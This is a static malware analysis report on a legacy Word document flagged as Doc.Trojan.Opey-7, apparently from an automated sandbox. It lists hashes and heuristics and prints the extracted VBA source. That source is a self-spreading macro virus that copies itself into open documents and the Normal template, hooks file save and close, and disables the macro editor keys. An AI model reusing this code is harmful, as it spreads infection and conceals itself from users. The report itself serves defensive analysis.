Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 37f96d338d51d3c9…

MALICIOUS

Office (OLE)

43.5 KB Created: 1999-11-08 16:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: dad8288956b471f9bbe92c954f9f296f SHA-1: f01bb4a56de71e2f9c2080befd8ee280f6216f40 SHA-256: 37f96d338d51d3c9393976500941a20cafeb03f08dd3ee713f3a1a384e4cb594
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Opey-7'. It contains VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon opening a document. The VBA code appears to be an anti-virus macro designed to detect and remove other macro viruses, a common tactic used by malware to protect itself or to masquerade as legitimate security software. The presence of the AutoOpen macro and the ClamAV detection strongly indicate a malicious intent, likely to download or execute further payloads.

Heuristics 4

  • ClamAV: Doc.Trojan.Opey-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Opey-7
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4783 bytes
SHA-256: 9bb94499bbb5d66944a5e91d2b64700d40a22a53547b6569b2882e36ff7e7f15
Detection
ClamAV: Doc.Trojan.Opey-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Detect_Virus"
Sub detectS()

   ' ANTI-MACRO-VIRUS '99
   ' "Be nice!"

   
   
On Error Resume Next
Call Detect_Virus
NTInfected = False
OK = False
For i = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
            VIRUS_NAME = NormalTemplate.VBProject.VBComponents(i).Name
            If (VIRUS_NAME = "THE_UNKNOWN") Or (VIRUS_NAME = "A_OPEY_05") Or (VIRUS_NAME = "A_OPEY_03") _
            Or (VIRUS_NAME = "Cartman") Or (VIRUS_NAME = "detect") Then
            counter = counter + 1
               MsgBox ("ALERT :  " + VIRUS_NAME + "  macro virus detected!")
               Application.VBE.ActiveVBProject.VBComponents.Remove Application.VBE.ActiveVBProject.VBComponents(VIRUS_NAME)
               MsgBox (VIRUS_NAME + " macro virus found and cleaned.")
               Key = True
            End If
            If VIRUS_NAME = "Detect_Virus" Then NTInfected = True
            If (VIRUS_NAME <> "Detect_Virus") And (VIRUS_NAME <> "ThisDocument") Then Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=VIRUS_NAME, Object:=wdOrganizerObjectProjectItems
Next i
      For Each opendoc In Documents
            ODInfected = False
            With opendoc
                For j = opendoc.VBProject.VBComponents.Count To 1 Step -1
                VIRUS_NAME = opendoc.VBProject.VBComponents(j).Name
                  If (VIRUS_NAME = "THE_UNKNOWN") Or (VIRUS_NAME = "A_OPEY_05") Or (VIRUS_NAME = "A_OPEN_03") _
                    Or (VIRUS_NAME = "Cartman") Or (VIRUS_NAME = "detect") Then
                    MsgBox ("ALERT :  " + VIRUS_NAME + "  macro virus detected!")
                    Application.VBE.ActiveVBProject.VBComponents.Remove Application.VBE.ActiveVBProject.VBComponents(VIRUS_NAME)
                    MsgBox (VIRUS_NAME + " macro virus found and cleaned.")
                    Key = True
                  End If
                Next j
                If ODInfected = False Then
                    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=opendoc.FullName, Name:="Detect_Virus", Object:=wdOrganizerObjectProjectItems
                End If
            End With
           Next opendoc
            If NTInfected = False Then
                Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Detect_Virus", Object:=wdOrganizerObjectProjectItems
                NormalTemplate.Save
            End If
      If Key = True Then
        ActiveDocument.Save
        Application.Quit
      End If
End Sub
Sub Detect_Virus()
    On Error Resume Next
    Application.UserName = "ANTI-VIRUS PROTECTION"
    Application.UserAddress = ""
    Application.UserInitials = ""
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "Detector"
        .Keywords = "Check your file."
        .Title = ""
        .Execute
    End With
    With Options
        .ConfirmConversions = True
        .VirusProtection = True
        .SaveNormalPrompt = True
    End With
    With ActiveDocument
        .ReadOnlyRecommended = False
    End With
    On Error Resume Next
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
End Sub
Sub FileSave()
    On Error Resume Next
    Call detectS
    ActiveDocument.Save
End Sub
Sub FileClose()
    On Error Resume Next
    Call detectS
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
End Sub
Sub FileExit()
    On Error Resume Next
    Call detectS
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub
Sub FileNew
... (truncated)